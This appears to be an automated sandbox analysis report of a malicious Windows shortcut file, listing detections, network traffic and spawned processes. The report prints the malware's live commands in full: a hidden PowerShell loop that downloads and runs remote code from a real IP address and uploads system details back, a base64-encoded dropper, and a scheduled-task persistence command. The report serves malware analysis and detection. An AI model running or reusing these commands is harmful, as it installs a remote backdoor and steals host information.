nPB/8uSMdbEIEuS
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5200, ProcessName: svchost.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: XA5hQdlKVd.lnkReversingLabs: Detection: 47%
              Source: XA5hQdlKVd.lnkVirustotal: Detection: 48%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
              Source: Binary string: ystem.Core.pdbz source: powershell.exe, 0000000E.00000002.3044779615.0000020A42327000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbCore.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000E.00000002.2976704530.0000020A2833C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A4252E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ion.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A4252E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *.pdb\ source: powershell.exe, 0000000E.00000002.3043497362.0000020A42291000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: icrosoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbh source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: winword.exeMemory has grown: Private usage: 1MB later: 82MB

              Networking

              barindex
              Potential dropper URLs found in powershell memory
              Source: powershell.exe, 00000000.00000002.2397110961.0000023E4AB46000.00000004.00000020.00020000.00000000.sdmpString found in memory: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id"rId1 Type"http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties Target"docProps/core.xml/><Relationship Id"rId2 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties Target"docProps/app.xml/><Relationship Id"rId3 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument Target"word/document.xml/>
              Source: powershell.exe, 00000000.00000002.2397110961.0000023E4AB46000.00000004.00000020.00020000.00000000.sdmpString found in memory: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id"rId1 Type"http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties Target"docProps/core.xml/><Relationship Id"rId2 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties Target"docProps/app.xml/><Relationship Id"rId3 Type"http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocume
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 37662
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 37662
              Source: global trafficTCP traffic: 192.168.2.6:49735 -> 147.78.46.40:37662
              Source: global trafficHTTP traffic detected: GET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1Host: 147.78.46.40:37662Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1Host: 147.78.46.40:37662Connection: Keep-Alive
              Source: Joe Sandbox ViewASN Name: CONNECTLB CONNECTLB
              Source: unknownTCP traffic detected without corresponding DNS query: 147.78.46.40
              Source: unknownTCP traffic detected without corresponding DNS query: 147.78.46.40
              Source: unknownTCP traffic detected without corresponding DNS query: 147.78.46.40
              Source: unknownTCP traffic detected without corresponding DNS query: 147.78.46.40
              Source: unknownTCP traffic detected without corresponding DNS query: 147.78.46.40
              Source: unknownTCP traffic detected without corresponding DNS query: 147.78.46.40
              Source: unknownTCP traffic detected without corresponding DNS query: 147.78.46.40
              Source: unknownTCP traffic detected without corresponding DNS query: 147.78.46.40
              Source: unknownTCP traffic detected without corresponding DNS query: 147.78.46.40
              Source: unknownTCP traffic detected without corresponding DNS query: 147.78.46.40
              Source: global trafficHTTP traffic detected: GET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1Host: 147.78.46.40:37662Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1Host: 147.78.46.40:37662Connection: Keep-Alive
              Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.78.46.40:37662
              Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B4F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.78.46.40:37662(
              Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B7BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.78.46.40:37662/xsSpQbS
              Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt
              Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.78.46.40:37662/xsSpQbSP
              Source: powershell.exe, 0000000E.00000002.2976613455.0000020A28295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.78.46.40:37662/xsspqbsoghyzmlxz/page164/upgrade.txt
              Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.78.46.40:37662P
              Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2B879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.78.46.40:43891/page164
              Source: powershell.exe, 0000000E.00000002.2976613455.0000020A28295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftK8
              Source: svchost.exe, 0000000A.00000002.3430811641.0000023B7188B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: svchost.exe, 0000000A.00000003.2405283558.0000023B71540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000000.00000002.2389679452.0000023E4277D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2389679452.0000023E428B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2370858356.0000023E342E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A2B8AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A39F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000000.00000002.2397944415.0000023E4ABBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlfo
              Source: powershell.exe, 00000000.00000002.2370858356.0000023E32701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A29EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000000.00000002.2397110961.0000023E4AB46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mcrosoft.com
              Source: powershell.exe, 00000000.00000002.2370858356.0000023E32701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A29EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: svchost.exe, 0000000A.00000003.2405283558.0000023B7159E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 0000000A.00000003.2405283558.0000023B71540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2A0DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000E.00000002.2978895978.0000020A2AB3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000000.00000002.2389679452.0000023E4277D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2389679452.0000023E428B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2370858356.0000023E342E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2978895978.0000020A2B8AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A39F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3036412556.0000020A3A066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000000.00000002.2370858356.0000023E33E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: Process Memory Space: powershell.exe PID: 3540, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}Jump to behavior
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3479394D0_2_00007FFD3479394D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD343354A014_2_00007FFD343354A0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD3433249D14_2_00007FFD3433249D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD3433409914_2_00007FFD34334099
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD34333DFA14_2_00007FFD34333DFA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD34333B6714_2_00007FFD34333B67
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD3433636514_2_00007FFD34336365
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD34335B7F14_2_00007FFD34335B7F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD3440091E14_2_00007FFD3440091E
              Source: unknownProcess created: Commandline size = 10234
              Source: Process Memory Space: powershell.exe PID: 3540, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@12/243@0/2
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Libraries\Libraries.vbsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3968:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yz42ofw0.1n5.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: XA5hQdlKVd.lnkReversingLabs: Detection: 47%
              Source: XA5hQdlKVd.lnkVirustotal: Detection: 48%
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='UEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAALAAAAX3JlbHMvLnJlbHOtkk1LA0EMhu/9FUPu3WwriMjO9iJCbyL1B4SZ7O7Qzgczaa3/3kEKulCKoMe8efPwHNJtzv6gTpyLi0HDqmlBcTDRujBqeNs9Lx9g0y+6Vz6Q1EqZXCqq3oSiYRJJj4jFTOypNDFxqJshZk9SxzxiIrOnkXHdtveYfzKgnzHV1mrIW7sCtftI/Dc2ehayJIQmZl6mXK+zOC4VTnlk0WCjealx+Wo0lQx4XWj9e6E4DM7wUzRHz0GuefFZOFi2t5UopVtGd/9pNG98y7zHbNFe4ovNosPZG/SfUEsHCOjQASPZAAAAPQIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAGRvY1Byb3BzL2NvcmUueG1sbVJbS8MwFH73V5S8t+kFZZS2A5U9ORA2UXyLyVkXbdKQnK3bvzdtt7rhoA/nu/Q7OScp5gfVBHuwTra6JEkUkwA0b4XUdUne1otwRgKHTAvWtBpKcgRH5tVdwU3OWwuvtjVgUYILfJB2OTcl2SKanFLHt6CYi7xDe3HTWsXQQ1tTw/gPq4GmcfxAFSATDBntA0MzJZJTpOBTpNnZZggQnEIDCjQ6mkQJ/fMiWOVu/jAoF04l8WjgpvUsTu6Dk5Ox67qoywarP39CP5Yvq2HUUOp+VRxIVQiecwsMW1sV9BL4WoDjVhr0Kx/FK8Ljhul65/dTgQ7fVoNlovrNN8zh0t/RRoJ4PPqMG9xpE7k6cYEfIR8HPkvv2dPzekGqNE6zMJ6FcbZOs/x+5r/Pvul1wNDZwl72T6VKhqYT7E/tdl/fwHEcaQK+RokNjPS5/Pd8ql9QSwcI1kKz4VIBAACKAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAQAAAAZG9jUHJvcHMvYXBwLnhtbJ1R0W6DIBR931cYs9eKUrW2oTTLlj01WZO5dm8N4lVZFAjQpv37sTZzPg9e7rnncA5wyeYy9MEZjBVKrsMkisMAJFe1kO06/ChfZ0UYWMdkzXolYR1ewYYb+kB2RmkwToANvIO067BzTq8QsryDgdnI09IzjTIDcx6aFqmmERxeFD8NIB3CcZwjuDiQNdQzPRqGd8fV2f3XtFb85352X16196OkhEH3zAEl6K8slWN9KQagsW+PgDxp3QvOnP8RuhWVgbdbBFpEmd/4cSvk6XL8LPJjngYTwdE/4Qu4Q5wVDSxSnOIcF3HWYDyvlgzP52nFF0mRsKriVZMBQdOon9z9fRA0yaLYr5vgt0d2rAVLMUH3ghyUqS1NigVB95I8d8ww7vwBmuS5V04aE/IgXPeuGfcmyTJJp7IJ5fMMaw3TnaXpLXWEHozTot9QSwcILVvKq0sBAABDAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAcAAAAd29yZC9fcmVscy9kb2N1bWVudC54bWwucmVsc62RTQrCMBCF954izN6mVRCRpm5EcCv1ADGdtsE2CckoensDiloo4sLl/H3vMS9fX/uOXdAHbY2ALEmBoVG20qYRcCi30yWsi0m+x05SXAmtdoHFGxMEtERuxXlQLfYyJNahiZPa+l5SLH3DnVQn2SCfpemC+08GFAMm21UC/K7KgJU3h7+wbV1rhRurzj0aGpHggW4dhkiUvkES8KiTyAE+Lj/7p3xtDZXy2OHbwav1zcT8rz9Aopjl5xeenaeFSc4H4RZ3UEsHCPkvMMDFAAAAEwIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAHdvcmQvZG9jdW1lbnQueG1s7V1bb9tGFn7fXzHQQ7ELKBJ1sSyrlYtugnQDpEFQp+hjQFGUxF1S1JKUZffJjpqkBYI6yAYukL2kwS5291H2RrUSXwrsLxj+hf0le84MSV0sJbZkxyI1TiuSM3MOZ4bfmXPmduaTTzcMnayrlq2Z9WIslZBiRK0rZlmrV4uxr+7dvJaPEduR62VZN+tqMbap2rFPV3/1SatQNpWmodYdAhzqdsEsxppWvWArNdWQ7WuGplimbVaca4ppFMxKRVNU7xLzKKxirOY4jUIy6RElzIZah7iKaRmyA49WNclJbnjvSqYlKZe0VF12IL92TWvYPrf1d71/3dD9dK2zvLVlWuWGZSqqbUNFGDp/ryFr9YBNSjpDgZFPQNE4y5vLltwaeOVwRm7wyD5H+xTLIBsJyIZXe4wL8EtJI/zWanJD7XOrzsbtc8tsNnxuhnKW0hqy9YdmA2usAV+0pOmas8kK3s9UKjtbrkbrbDp+A/hJLZ2PQTpgYCiFW9W6acklHSQJckKweAQ4xlZBoEpmeROvDfZz12KXNWdTV0mrsC7rxdgdrDo9lmSptbLmh0s8yG7IChQVQnWtrn7ZxLeoG7LixLygYiydlfChpMJXUJEQHuSKo1oBE61extRqxfGiLa1a8+9rcr3KWgYv8e8VPwsKSKdq8VCL5926adYdG19gK5pWjN3TDNUmd9QW+dI05Drj91ndHh+jyrbzma3JYyMV+3QwrxT2q5i6afkZk5uOOVo9Q5X2jR+QznshNayBiqb71EEZdVVmRUx6ZUwG38kaV+5zl2GauppUbon9XVbJWwVnlb5y2/Q1PaH7tEPoL3jj7rrb7gP6lgW4W/SEQGQPng/xl2BqAimAzG0jL4dz5DUpsC+wHxrs7wOOGcQ7iHriPgKAww09dJ/QY7i+iROIek2P4P6YiwUmBuGAdEEKT0bekZB2if8aEDAQMnfLbbvf0S5EHbs7ccLIvkN+QqAuVqC0gd9pxS
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\appdata\local\temp\Return.docx" /o ""
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}
